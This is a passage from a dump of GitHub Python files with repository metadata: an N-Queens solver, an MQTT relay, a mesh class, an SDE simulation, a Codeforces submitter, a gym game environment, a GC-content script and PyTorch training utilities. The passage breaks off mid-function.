the next queen\n            queens[idx] = -1\n\n\nT = int(input())\nfor tc in range(1, T+1):\n    N = int(input())\n    queens = [-1]*N # index = row, value = column (one queen can be placed per row)\n    answer = 0\n    set_queens(0) # start by placing a queen on row 0\n\n    print('#{} {}'.format(tc, answer))","repo_name":"charlie-jyj/APS","sub_path":"algorithm_practice/0420/SWEA_2806_NQueen_정유진.py","file_name":"SWEA_2806_NQueen_정유진.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"558043859","text":"#!/usr/bin/python3\nimport socket\nimport sys\nimport signal\n\nimport paho.mqtt.client as mqtt\n\n#mqtt stuff\n#state topics: are just the dictionary names \nbroker_address = \"localhost\"\nmqtt_state_prefix = \"ard_state/\"\nclient = mqtt.Client(\"P25\")\n\ndef on_message(client, userdata, message):\n    print(message.topic, \" \", str(message.payload.decode(\"utf-8\")))\n    topic = message.topic.split(\"/\")\n    print(topic)\n    if topic[0]==\"ard_command\":\n        echo = \"!c!\" + topic[1] + \"!\" + str(message.payload.decode(\"utf-8\")) + \"$\\n\"\n        print(\">>>\" + echo)\n        sock.send(echo.encode());\n    \ndef publish_mqtt(key, payload):\n    client.publish(mqtt_state_prefix + key, payload)\n    \n    \n\n    \n\n# Create a TCP/IP socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# Connect the socket to the port where the server is listening\nserver_address = ('raspberrypi.fritz.box', 8888)\nprint ('connecting to %s port %s' % server_address)\nsock.connect(server_address)\n\n\n#message = 'This is the message. 
It will be repeated.'\n#print( 'sending \"%s\"' % message)\n#sock.sendall(message)\n\ndef signal_handler(sig, frame):\n    sock.close()\n    \n    print('Exit...')\n    sys.exit(0)\n    \nif __name__ == \"__main__\":\n\n    #mqtt\n    client.on_message=on_message\n    client.connect(broker_address)\n    client.loop_start() \n    client.subscribe([(\"ard_state/#\",1), (\"ard_command/#\",1)])\n\n    # graceful Ctrl+C handling\n    signal.signal(signal.SIGINT, signal_handler)\n\n    amount_received = 0\n\n    message_complete=0\n    message=''\n\n    while 1:\n        if not(message_complete):\n            char = sock.recv(1)\n            #print(char)\n            if char==b'$':\n                message_complete=1\n            else:\n                if char==b'\\n':\n                    message=''\n                else:\n                    message += char.decode('UTF-8') \n        else:\n            print(message)\n            message_complete=0\n            sub_message = message.split(\"!\")\n            if len(sub_message)>=4:\n                if sub_message[1]==\"s\":\n                    publish_mqtt(sub_message[2], sub_message[3])\n            \n            #print(sub_message)\n            \n\n\n    sock.close()\n","repo_name":"e33b1711/power_raspi","sub_path":"mqtt_relay.py","file_name":"mqtt_relay.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"6065630492","text":"import itertools\n\nimport numpy as np\nfrom SSplines.helper_functions import barycentric_coordinates\n\n\nclass Mesh(object):\n    \"\"\"\n    Given a set of vertices and a connectivity matrix describing each triangle,\n    represents the corresponding mesh.\n    \"\"\"\n\n    def __init__(self, vertices, connectivity_matrix):\n        \"\"\"\n        Initialize a mesh with connectivity matrix and vertices.\n        :param np.ndarray vertices: vertex coordinates\n        :param np.ndarray connectivity_matrix: vertex indices\n        \"\"\"\n\n        self.vertices = vertices\n        self.triangles = connectivity_matrix\n\n        self._generate_data()\n        self._compute_h()\n\n    def interior_vertices(self):\n        return self.int_vertices\n\n    def interior_edges(self):\n        return self.int_edges\n\n    def boundary_vertices(self):\n        return self.bnd_vertices\n\n    def boundary_edges(self):\n        return self.bnd_edges\n\n    def get_edge(self, edge_id):\n        edge_vertices = self.edge_vertices[edge_id]\n        edge_coords = self.vertices[edge_vertices, :]\n\n        return edge_coords\n\n    def get_vertex(self, vertex_id):\n        return self.vertices[vertex_id]\n\n    def get_edge_id(self, edge):\n        return self.edge_indices[edge]\n\n    def get_vertex_id(self, vertex):\n        for k in range(len(self.vertices)):\n            if vertex == self.vertices[k]:\n                return k\n        return -1\n\n    def incident_triangles(self, vertex_index):\n        \"\"\"\n        Return a list of the triangles that contain the given vertex.\n        :param vertex_index: vertex number\n        :return: list of the triangles\n        \"\"\"\n\n        triangle_idx = []\n        for k in range(len(self.triangles)):\n            if vertex_index in self.triangles[k]:\n                triangle_idx.append(k)\n        return triangle_idx\n\n    def adjacent_triangles(self, edge_index):\n        \"\"\"\n        Return a list of the triangles sharing edge edge_index\n        :param edge_index: edge index\n        :return: list of triangles sharing edge.\n        \"\"\"\n\n        edge = self.edge_vertices[edge_index]\n        triangle_idx = []\n        for k in range(len(self.triangles)):\n            if edge[0] in self.triangles[k] and edge[1] in self.triangles[k]:\n                triangle_idx.append(k)\n        return triangle_idx\n\n    def _compute_h(self):\n        \"\"\"\n        Computes the max, min and average triangle side-length in the mesh.\n        \"\"\"\n\n        edge_lengths = np.zeros(len(self.edges))\n\n        for e in self.edges:\n            i, j = self.edge_vertices[e]\n            v1, v2 = self.vertices[[i, j], :]\n            edge_lengths[e] = np.sqrt((v2[0] - v1[0]) ** 2 + (v2[1] - v1[1]) ** 2)\n\n        self.h_max = 
max(edge_lengths)\n self.h_min = min(edge_lengths)\n self.h_avg = np.average(edge_lengths)\n\n def _generate_data(self):\n\n # unique edges in the mesh\n self.edge_vertices = np.array(list(set(tuple(sorted(edge))\n for triangle in self.triangles\n for edge in itertools.combinations(triangle, 2))))\n\n # edge to edge_index map - edges with reverse orientation map to same index\n self.edge_indices = {tuple(edge): i\n for i, edge_ in enumerate(self.edge_vertices)\n for edge in (edge_, reversed(edge_))}\n\n # list of boundary edges\n self.bnd_edges = sorted([self.edge_indices[tuple(edge)] for edge in self.edge_vertices\n if len(self.adjacent_triangles(self.edge_indices[tuple(edge)])) == 1])\n\n # list of boundary vertices\n self.bnd_vertices = sorted(list(set([vertex\n for edge in self.bnd_edges\n for vertex in self.edge_vertices[edge]])))\n\n self.int_edges = [self.edge_indices[tuple(edge)] for edge in self.edge_vertices\n if self.edge_indices[tuple(edge)] not in self.bnd_edges]\n\n self.int_vertices = [vertex_id for vertex_id in range(len(self.vertices)) if vertex_id not in self.bnd_vertices]\n\n self.edges = self.bnd_edges + self.int_edges\n\n def find_triangle(self, x):\n \"\"\"\n Given a point x in the domain of the triangulation, determine for which index i\n the point x lies in triangle i.\n :param np.ndarray x: point of interest\n :return: index i such that x lies in T_i\n \"\"\"\n\n for k, T in enumerate(self.triangles):\n vertices = self.vertices[T]\n b = barycentric_coordinates(triangle=vertices, x=x)\n\n if np.all(b >= 0):\n return k\n else:\n continue\n\n return k\n","repo_name":"qTipTip/PSFEM","sub_path":"PSFEM/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":4712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5541645482","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nt_0 = 0 # define model parameters\nt_end = 4\nlength = 1000\ntheta = 1.1\nmu = 0.8\nsigma = 0.3\nt = np.linspace(t_0,t_end,length) # define time axis\ndt = np.mean(np.diff(t))\ny = np.zeros(length)\ny0 = np.random.normal(loc=0.0,scale=1.0) # initial condition\ndrift = lambda y,t: theta*(mu-y) # define drift term, google to learn about lambda\ndiffusion = lambda y,t: sigma # define diffusion term\nnoise = np.random.normal(loc=0.0,scale=1.0,size=length)*np.sqrt(dt) #define noise process\n# solve SDE\nfor i in range(1,length):\n y[i] = y[i-1] + drift(y[i-1],i*dt)*dt + diffusion(y[i-1],i*dt)*noise[i]\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\n\n\"\"\"\nanimation example 2\nauthor: Kiterun\n\"\"\"\n\nfig, ax = plt.subplots()\nx = np.linspace(0, 2*np.pi, 200)\ny = np.sin(x)\nl = ax.plot(x, y)\ndot, = ax.plot([], [], 'ro')\n\ndef init():\n ax.set_xlim(0, 2*np.pi)\n ax.set_ylim(-1, 1)\n return l\n\ndef gen_dot():\n for i in np.linspace(0, 2*np.pi, 200):\n newdot = [i, np.sin(i)]\n yield newdot\n\ndef update_dot(newd):\n dot.set_data(newd[0], newd[1])\n return dot,\n\nani = animation.FuncAnimation(fig, update_dot, frames = gen_dot, interval = 100, init_func=init)\nani.save('sin_dot.gif', writer='imagemagick', fps=30)\nplt.show()\n","repo_name":"newworldszd/price","sub_path":"venv/venv/ornstein.py","file_name":"ornstein.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71875679772","text":"import datetime\nimport 
submissionListener\nfrom bs4 import BeautifulSoup\nfrom tkinter import messagebox\nimport threading\ndef submutSolution(link, session, problem, filepath):\n if not filepath:messagebox.showerror(title=\"Error\",message=\"Please Choose a File\");return\n bol = messagebox.askyesno(title=\"Confirmation\", message=\"Are you sure that you want to submit this solution?\")\n if not bol:return\n problem_id = problem\n if filepath[-1] == \"y\":\n programming_language = 'Python'\n elif filepath[-1] == \"p\":\n programming_language = 'C++'\n elif filepath[-1] == \"a\":\n programming_language = 'Java'\n\n submission_page = session.get(f\"{link}/submit\").content\n soup = BeautifulSoup(submission_page, 'html.parser')\n form_data = {}\n for field in ['csrf_token' ]:\n field_value = soup.find('input', {'name': field}).get('value', '')\n form_data[field] = field_value\n form_data['submittedProblemIndex'] = problem_id\n # Read the source code from the file and add it to the form data\n with open(filepath, 'r') as f:\n source_code = f.read()\n form_data['source'] = source_code\n\n # Set the programming language in the form data\n language_map = {\n 'C++': '54',\n 'Java': '36',\n 'Python': '31',\n # Add more languages as necessary\n }\n form_data['programTypeId'] = language_map[programming_language]\n\n # Submit the solution\n response = session.post(f'{link}/submit', data=form_data)\n \n if \"You have submitted exactly the same code before\" in response.text:\n messagebox.showerror(\"Error\",\"You submitted this code before.\")\n return\n # Print the response status code and content\n if response.status_code == 200:\n messagebox.showinfo(title=\"Success!\",message=\"Submited Successfuly\")\n while True:\n try:\n data = session.get(f\"{link}/my\")\n break\n except:\n continue\n\n soup = BeautifulSoup(data.text, 'html.parser')\n submissions = soup.find('table', {'class': 'status-frame-datatable'})\n\n subnum = [td.text.strip() for td in submissions.find_all('tr')[1].find_all('td')][0]\n thread2 = threading.Thread(target = lambda :submissionListener.waitForIt(link,session,subnum))\n thread2.start()\n else:\n messagebox.showerror(title=\"Failure!\",message=\"something went wrong, try again.\")","repo_name":"eng-noorelmobasher/PC-Cubed-System-for-Codeforces","sub_path":"submit.py","file_name":"submit.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"5509031830","text":"import numpy as np\nimport hex_helpers as hh\nimport copy\nimport gym\nimport time\nimport copy\nfrom gym import spaces\nfrom minimax_agent import MinimaxAgent\nfrom generic_env_helpers import apply_move, all_moves, is_done, score, AGENT_ID, OPPENENT_ID\nfrom state_generator import generate_state, observation_from_state\n\n#TODO:stop hardcoding the player\n#TODO:generate boards randomly\nboard = [\n [-1, -1, 1, 0, 0, 0, 0, -1, -1],\n [-1, -1, 0, 0, 0, 0, 0, -1, -1],\n [-1, 0, 0, 0, 0, 0, 0, 0, -1],\n [ 1, 0, 0, 0, 0, 0, 0, 0, -1],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, -1],\n [-1, -1,-1, 0, 0, 0, 0, 0, -1],\n [-1, 0,-1, 0, 0, 0, 0, -1, -1],\n [-1, -1, 0, 0, 0, 0, 2, -1, -1]\n]\n\nboard2 = [\n [-1, 1, 0, 2, -1],\n [0, -1, 0, 0, -1],\n [2, 0, 0, 0, 1],\n [0, 0, 0, -1, -1],\n [-1, 1, 0, 2, -1]\n]\n\ndefaultState = {\n 'board': board2,\n 'jumps': [0, 0],\n 'adds': [1, 1],\n 'current_move': 1\n}\n\nWRONG_MOVE_PUNISHMENT = -20\nclass GenericEnv(gym.Env):\n def __init__(self):\n global OPPENENT_ID\n self.metadata = \"useless 
crap\"\n self.enemyAI = MinimaxAgent(OPPENENT_ID, ply=1)\n self.reset()\n\n \"\"\"\n Resets the state of the environment and returns an initial observation.\n Returns: observation (object): the initial observation of the\n space.\n \"\"\"\n def reset(self):\n # self.state = copy.deepcopy(defaultState)\n self.state = generate_state(size = 5)\n self.update_spaces()\n self.all_moves = all_moves(self.state)\n self.observation = observation_from_state(self.state)\n return self.observation\n\n def step(self, action, debug=0):\n if debug:\n print(self.state)\n move = self.action_to_move(action)\n self.observation, mv_error = apply_move(move, AGENT_ID, self.observation)\n if debug:\n print(self.state)\n #Greedy AI processing\n move = self.enemyAI.select_move(self.observation, debug)\n self.observation, _ = apply_move(move, OPPENENT_ID, self.observation)\n reward = score(AGENT_ID, self.observation)\n done = is_done(self.observation)\n if(mv_error == True):\n done = True\n reward = WRONG_MOVE_PUNISHMENT\n if debug:\n print(done)\n # self.action_space = moves(1, self.state) - THIS SHOULD BE STATIC I BELIEVE\n return self.observation, reward, done, 0\n\n \"\"\"\n We dont use this crap\n \"\"\"\n def render(self, mode='human', close=False):\n return\n\n # \"PRIVATE\" methods\n\n \"\"\"\n Not confusing naming at all\n \"\"\"\n def action_to_move(self, action):\n move = self.all_moves[action]\n return move\n\n def update_spaces(self):\n height = len(self.state['board'])\n width = len(self.state['board'][0])\n # self.action_space = moves(1, state) THIS SHOULD BE FIXED-SIZE SOMEHOW - ALL POSSIBLE/IMPOSSIBLE MOVEs\n # The RL agent cant use our `moves` because it can work only with\n # static action_space shape and static observation_space shape\n # Long array of all possible moves for this board (including illegal) - (see `all_moves` func).\n moves_count = len(all_moves(self.state))\n # print('Move count: ', moves_count)\n self.action_space = spaces.Discrete(moves_count) # number of actions from 0 to all_moves.size\n # board value range from -(1 to 2) = (0 to 3) = 3\n # but adds from 0 to 1\n # and jump 0 to Inf\n # so let it be 5. 
Also see `observation_from_state`\n self.observation_space = spaces.Box(low=-1.0, high=10.0, shape=(1,height * height + 5), dtype=np.int8) # spaces.Discrete(5)\n self.reward_range = [WRONG_MOVE_PUNISHMENT, -WRONG_MOVE_PUNISHMENT] #score is reward???","repo_name":"iSarCasm/DeepMind_Lab","sub_path":"generic_env/envs/generic_env.py","file_name":"generic_env.py","file_ext":"py","file_size_in_byte":3788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30027749858","text":"rd=True\nstarted=False\nwhile True:\n\tq=input(\"(type help for commands)>\").lower()\n\tif q==\"help\":\n\t\tprint(\"start to start the car \\n stop to stop the car \\n quit to exit\")\n\telif q==\"start\":\n\t\tif started:\n\t\t\tprint(\"car is already started\")\n\t\telse:\n\t\t\tstarted=True\n\t\t\tprint(\"car started\")\n\telif q==\"stop\":\n\t\tif not started:\n\t\t\tprint(\"car is already stopped\")\n\t\telse:\n\t\t\tstarted=False\n\t\t\tprint(\"car stopped\")\n\telif q==\"quit\":\n\t\tprint(\"thank you for playing see you later\")\n\t\tbreak\n\telse:\n\t\tprint(\"i don't understand that command\")\nprint(\"bhoi rox\")\n","repo_name":"st3v3j-dedx/first-project","sub_path":"root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42689157524","text":"#!/usr/bin/python3\nimport sys\n\ndef parse_fasta(file):\n parsed_fasta = {} #intialize empty dict\n strings = file.strip().split('>') #remove whitespace, split on carat into list\n\n for line in strings: #for each element in list\n if len(line) == 0: #if empty, skip\n continue\n parts = line.split() #split the element (newlines)\n label = parts[0] #first split is label\n bases = ''.join(parts[1:]) #join all other elements as bases\n parsed_fasta[label] = bases #add label and bases to dict\n\n return parsed_fasta\n\n\ndef gc_content(data):\n total_len = len(data) #determine length of seq\n count = 0 #initialize count to zero\n\n for base in data: #for each base in data\n if base == 'G' or base == 'C': #if G or C add one to count\n count += 1\n\n return 100 * (float(count) / total_len) #return the number of G or C bases / total *100 (percent)\n\n\ndef main(arg):\n\n large_dataset = open(arg).read() #load in data from argument\n\n parsed_fasta = parse_fasta(large_dataset) #pass to function\n #build new dict with results\n results = dict([(label,gc_content(data)) for label,data in parsed_fasta.items()])\n\n highest_data = 0 #initialize empty var as zero\n highest_label = None #same\n for label,data in results.items(): #for each entry in results\n if data > highest_data: #test for highest GC percentage\n highest_data = data\n highest_label = label\n\n print(highest_label) #print highest GC% and label\n print('{:.6f}'.format(round(highest_data,6)))\n\n return\n\n\nif len(sys.argv) > 1: #exit if no arguments supplied\n main(sys.argv[1])\nelse:\n print(\"improper usage: python3 tool.py ./fasta_file\")\n","repo_name":"danielpeterson0530/Code","sub_path":"Python/Scripts/largestGC.py","file_name":"largestGC.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"42216107493","text":"# 3rd party\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport cv2\n\n# Python std\nimport os\nfrom collections import OrderedDict\nimport shutil\n\n# project files\nfrom .. import file_sys as jbfs\nfrom .. 
import vis3d as jbv3\nfrom .. import depth as jbd\n\n\nclass TrainStateSaver:\n \"\"\" Saves the training state (weights, optimizer and lr scheduler params)\n to file.\n\n Args:\n path_file (str): Path to file.\n model (torch.nn.Module): Model from which weights are extracted.\n optimizer (torch.optim.Optimizer): Optimizer.\n scheduler (torch.optim._LRScheduler): LR scheduler.\n verbose (bool): Whether to print debug info.\n \"\"\"\n def __init__(self, path_file, model=None, optimizer=None, scheduler=None,\n batch_sampler=None, verbose=False):\n self._path_file = path_file\n self._model = model\n self._optimizer = optimizer\n self._scheduler = scheduler\n self._batch_sampler = batch_sampler\n self._verbose = verbose\n\n if not os.path.exists(os.path.dirname(path_file)):\n raise Exception('Path \"{}\" does not exist.'.format(path_file))\n\n for var, name in zip(\n [model, optimizer, scheduler, batch_sampler],\n ['model', 'optimizer', 'scheduler', 'batch_sampler']):\n if var is None:\n print('[WARNING] TrainStateSaver: {} is None and will not be '\n 'saved'.format(name))\n\n def get_file_path(self):\n return self._path_file\n\n def get_file_dir(self):\n return os.path.dirname(self._path_file)\n\n def __call__(self, file_path_override=None, **kwargs):\n state = kwargs\n if self._model:\n state['weights'] = self._model.state_dict()\n if self._optimizer is not None:\n state['optimizer'] = self._optimizer.state_dict()\n if self._scheduler is not None:\n state['scheduler'] = self._scheduler.state_dict()\n if self._batch_sampler is not None:\n state['batch_sampler'] = self._batch_sampler.state_dict()\n\n # Get the output file path and save.\n path_file = (file_path_override,\n self._path_file)[file_path_override is None]\n\n # Save safely.\n file_exists = os.path.exists(path_file)\n\n # Create new tmp. name if the output file exists - not to overwrite it.\n pth_tmp = (path_file, jbfs.unique_file_name(path_file))[file_exists]\n\n # Try to save the file.\n try:\n torch.save(state, pth_tmp)\n except Exception as e:\n print('ERROR: The model weights file {} could not be saved and '\n 'saving is skipped. The exception: \"{}\"'.\n format(pth_tmp, e))\n if os.path.exists(pth_tmp):\n os.remove(pth_tmp)\n return\n\n # Delete the old file and rename the new one to match the required name.\n if file_exists:\n os.remove(path_file)\n os.rename(pth_tmp, path_file)\n\n if self._verbose:\n print('[INFO] Saved training state to {}'.format(path_file))\n\n\n# TODO\nclass PcloudsCmpVisualizer:\n \"\"\" Upon being called, visualizes two overlayed 3D pointclouds coming\n from two batches of pclouds. 
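By default the first pcloud is drawn in red and the second in green (see color_pcloud_a and color_pcloud_b below). 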
Each image consists of multiple rendered\n views of the pointclouds depending on `eles` and `azis`.\n\n Args:\n n (int): Max number of images.\n member_img_size (int): Size of one view within the whole image, px.\n azis (list): Azimuths for views, deg.\n eles (list): Elevations for views, deg.\n color_pcloud_a (tuple): Color of the first pcloud.\n color_pcloud_b (tuple): Color of the second pcloud.\n \"\"\"\n def __init__(self, n, member_img_size=200,\n azis=(-30., 30.), eles=(-30., 30.),\n color_pcloud_a=(1, 0, 0), color_pcloud_b=(0, 1, 0),\n marker_size=0.2, text=None, channels_first=True):\n\n gs = (len(eles), len(azis))\n self._n = n\n self._clra = np.array(color_pcloud_a)\n self._clrb = np.array(color_pcloud_b)\n self._eles = eles\n self._azis = azis\n self._text = text\n self._channels_first = channels_first\n\n self._vis = jbv3.MeshVisMPL(figsize=gs, dpi=member_img_size,\n show_axes=False, auto_axes_lims=True,\n ax_margin=0., pcloud=True,\n marker_size=marker_size)\n\n def __call__(self, batch_a, batch_b, clr_a=None, clr_b=None):\n \"\"\"\n Args:\n batch_a (np.array): Pclouds a, (B, N, 3), B is batch size.\n batch_b (np.array): Pclouds b, (B, M, 3), B is batch size.\n clr_a (np.array): Color or per-point color for pcloud a,\n shape (3, ) or (B, N, 3).\n clr_b (np.array): Color or per-point color for pcloud b,\n shape (3, ) or (B, M, 3).\n\n Returns:\n list of np.array: Rendered images.\n \"\"\"\n B, N = batch_a.shape[:2]\n B, M = batch_b.shape[:2]\n\n assert(batch_a.shape[0] == batch_b.shape[0])\n assert(clr_a is None or clr_a.shape == (3,) or clr_a.shape == (B, N, 3))\n assert(clr_b is None or clr_b.shape == (3,) or clr_b.shape == (B, M, 3))\n\n # If a single color is used, it has to have a shape (1, 3), not (3, ).\n if clr_a is None:\n clra = np.stack([self._clra[None]] * B, axis=0)\n else:\n clra = np.stack([clr_a[None]] * B, axis=0) if clr_a.ndim == 1 \\\n else clr_a\n\n if clr_b is None:\n clrb = np.stack([self._clrb[None]] * B, axis=0)\n else:\n clrb = np.stack([clr_b[None]] * B, axis=0) if clr_b.ndim == 1 \\\n else clr_b\n\n imgs = []\n for i in range(np.minimum(self._n, batch_a.shape[0])):\n self._vis.add_meshes([batch_a[i], batch_b[i]], None,\n colors_faces=[clra[i], clrb[i]])\n img = self._vis.get_img_multi_view(self._eles, self._azis,\n text=self._text)\n if self._channels_first:\n img = img.transpose((2, 0, 1))\n imgs.append(img)\n self._vis.clear()\n return imgs\n\n\nclass DmapsCmpVisualizer:\n \"\"\" Upon being called, visualizes GT and pred. 
depth maps next to each\n other.\n\n Args:\n n (int): Max number of images.\n \"\"\"\n def __init__(self, n, mask=True, text=None, text_pos=None):\n\n self._n = n\n self._mask = mask\n self._text = text\n self._text_pos = text_pos\n\n def __call__(self, batch_a, batch_b):\n \"\"\"\n Args:\n batch_a (np.array): Dmaps a, (B, H, W), B is batch size,\n (H, W) is dmap shape.\n batch_b (np.array): Dmaps b, (B, H, W), B is batch size,\n (H, W) is dmap shape.\n\n Returns:\n list of np.array: Rendered images, each of shape (H, W, 3).\n \"\"\"\n assert(batch_a.shape[0] == batch_b.shape[0])\n\n imgs = []\n for i in range(np.minimum(self._n, batch_a.shape[0])):\n dm_gt = batch_a[i]\n dm_p = batch_b[i]\n\n dmin = np.min(dm_gt[dm_gt != 0])\n dmax = np.max(dm_gt[dm_gt != 0])\n rang = dmax - dmin\n dmin -= 0.1 * rang\n dmax += 0.1 * rang\n\n mask = jbd.get_mask(dm_gt).astype(np.uint8)[..., None]\n img_gt = jbd.dmap2img(dm_gt, mode='custom', range=(dmin, dmax))\n img_p = jbd.dmap2img(dm_p, mode='custom', range=(dmin, dmax))\n img_p = img_p * mask if self._mask else img_p\n img = np.concatenate([img_gt, img_p], axis=1)\n if self._text is not None:\n tp = (self._text_pos,\n (10, img.shape[1] // 2 -\n int(img.shape[1] * 0.1)))[self._text_pos is None]\n img = cv2.putText(\n img, self._text, tp, cv2.FONT_HERSHEY_SIMPLEX, 1.,\n color=(255, 255, 255), thickness=2, lineType=cv2.LINE_AA)\n img = cv2.putText(img, 'GT', (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 1.,\n color=(255, 255, 255), thickness=2,\n lineType=cv2.LINE_AA)\n img = cv2.putText(img, 'pred', (img_gt.shape[1] + 10, 30),\n cv2.FONT_HERSHEY_SIMPLEX, 1., color=(255, 255, 255),\n thickness=2, lineType=cv2.LINE_AA)\n imgs.append(img)\n return imgs\n\n\ndef get_path_tr_state(path_tr_run, ext='tar'):\n \"\"\" Finds the training checkpoint file in `path_tr_run` and returns\n its path. The file is expected to be the only one with .`ext` extension.\n\n Args:\n path_tr_run (str): Path to training run.\n\n Returns:\n str: Path to train state .`ext` file.\n \"\"\"\n\n files_ext = jbfs.ls(path_tr_run, exts=ext)\n if len(files_ext) == 0:\n print(f\"[ERROR] Checkpoint (.{ext}) file not found in {path_tr_run}\")\n elif len(files_ext) > 1:\n print(f\"|[WARNING] More than one .{ext} file found in \"\n f\"{path_tr_run}. Returning {files_ext[0]}\")\n\n return jbfs.jn(path_tr_run, files_ext[0])\n\n\ndef get_path_conf(path_tr_run):\n \"\"\" Finds the conf file in `path_tr_run` and returns its path. The file\n is expected to be the only one with .yaml extension.\n\n Args:\n path_tr_run (str): Path to training run.\n\n Returns:\n str: Path to .yaml conf file.\n \"\"\"\n\n files_yaml = jbfs.ls(path_tr_run, exts='yaml')\n\n if len(files_yaml) == 0:\n print('[ERROR] Config file (.yaml) file not found in {}'.\n format(path_tr_run))\n elif len(files_yaml) > 1:\n print('[WARNING] More than one .yaml file found in {}. 
Returning'\n ' \"{}\"'.format(path_tr_run, files_yaml[0]))\n\n return jbfs.jn(path_tr_run, files_yaml[0])\n\n\ndef get_path_conf_tr_state(path_tr_run):\n \"\"\" Finds the training checkpoint and config file in `path_tr_run` and\n returns the paths.\n\n Args:\n path_tr_run (str): Path to training run.\n\n Returns:\n path_conf (str): Path to .yaml config file.\n path_tr_state (str): Path to .tar training state.\n \"\"\"\n\n path_conf = get_path_conf(path_tr_run)\n path_tr_state = get_path_tr_state(path_tr_run)\n\n return path_conf, path_tr_state\n\n\ndef summary(model, input_size, dtypes=torch.float32, batch_size=-1,\n device='cuda'):\n \"\"\" Prints Keras-like summary for a torch model. Code adapted form\n https://github.com/sksq96/pytorch-summary\n\n Args:\n model (nn.Module): Model.\n input_size (tuple or list of tuples): Size(s) of input tensor(s).\n dtypes (torch.dtype or list of torch.dtype): Dtype(s) of input\n tensor(s).\n batch_size (int): Batch size, if -1, 2 is used.\n device (str): Device, one of {'cuda', 'cpu'}.\n \"\"\"\n\n def register_hook(module):\n def hook(module, input, output):\n class_name = str(module.__class__).split(\".\")[-1].split(\"'\")[0]\n module_idx = len(summary)\n\n m_key = \"%s-%i\" % (class_name, module_idx + 1)\n summary[m_key] = OrderedDict()\n summary[m_key][\"input_shape\"] = list(input[0].size())\n summary[m_key][\"input_shape\"][0] = batch_size\n if isinstance(output, (list, tuple)):\n summary[m_key][\"output_shape\"] = [\n [-1] + list(o.size())[1:] for o in output\n ]\n else:\n summary[m_key][\"output_shape\"] = list(output.size())\n summary[m_key][\"output_shape\"][0] = batch_size\n\n params = 0\n if hasattr(module, \"weight\") and hasattr(module.weight, \"size\"):\n params += \\\n torch.prod(torch.LongTensor(list(module.weight.size())))\n summary[m_key][\"trainable\"] = module.weight.requires_grad\n if hasattr(module, \"bias\") and hasattr(module.bias, \"size\"):\n params += \\\n torch.prod(torch.LongTensor(list(module.bias.size())))\n summary[m_key][\"nb_params\"] = params\n\n if (\n not isinstance(module, nn.Sequential)\n and not isinstance(module, nn.ModuleList)\n and not (module == model)\n ):\n hooks.append(module.register_forward_hook(hook))\n\n device = device.lower()\n assert device in [\n \"cuda\",\n \"cpu\",\n ], \"Input device is not valid, please specify 'cuda' or 'cpu'\"\n\n # multiple inputs to the network\n if isinstance(input_size, tuple):\n input_size = [input_size]\n if not isinstance(dtypes, (tuple, list)):\n dtypes = [dtypes] * len(input_size)\n\n # batch_size of 2 for batchnorm\n x = [torch.rand(2, *in_size).type(dt).to(device) for (in_size, dt)\n in zip(input_size, dtypes)]\n # print(type(x[0]))\n\n # create properties\n summary = OrderedDict()\n hooks = []\n\n # register hook\n model.apply(register_hook)\n\n # make a forward pass\n # print(x.shape)\n model(*x)\n\n # remove these hooks\n for h in hooks:\n h.remove()\n\n print(\"----------------------------------------------------------------\")\n line_new = \"{:>20} {:>25} {:>15}\".\\\n format(\"Layer (type)\", \"Output Shape\", \"Param #\")\n print(line_new)\n print(\"================================================================\")\n total_params = 0\n total_output = 0\n trainable_params = 0\n for layer in summary:\n # input_shape, output_shape, trainable, nb_params\n line_new = \"{:>20} {:>25} {:>15}\".format(\n layer,\n str(summary[layer][\"output_shape\"]),\n \"{0:,}\".format(summary[layer][\"nb_params\"]),\n )\n total_params += summary[layer][\"nb_params\"]\n 
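# accumulate the output element count across layers; it feeds the forward/backward pass size estimate printed below\n        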
total_output += np.prod(summary[layer][\"output_shape\"])\n if \"trainable\" in summary[layer]:\n if summary[layer][\"trainable\"] == True:\n trainable_params += summary[layer][\"nb_params\"]\n print(line_new)\n\n # assume 4 bytes/number (float on cuda).\n total_input_size = np.sum([abs(np.prod(inps) * batch_size *\n 4. / (1024 ** 2.)) for inps in input_size])\n total_output_size = abs(2. * total_output * 4. / (1024 ** 2.))# x2 for grads\n total_params_size = abs(total_params.numpy() * 4. / (1024 ** 2.))\n total_size = total_params_size + total_output_size + total_input_size\n\n print(\"================================================================\")\n print(\"Total params: {0:,}\".format(total_params))\n print(\"Trainable params: {0:,}\".format(trainable_params))\n print(\"Non-trainable params: {0:,}\".format(total_params - trainable_params))\n print(\"----------------------------------------------------------------\")\n print(\"Input size (MB): %0.2f\" % total_input_size)\n print(\"Forward/backward pass size (MB): %0.2f\" % total_output_size)\n print(\"Params size (MB): %0.2f\" % total_params_size)\n print(\"Estimated Total Size (MB): %0.2f\" % total_size)\n print(\"----------------------------------------------------------------\")\n\n\ndef has_inf_nan(vals):\n \"\"\" Checks whether any of `vals` include inf or nan.\n\n Args:\n vals (torch.Tensor or list of torch.Tensor): Values to check.\n\n Returns:\n bool: Whether any 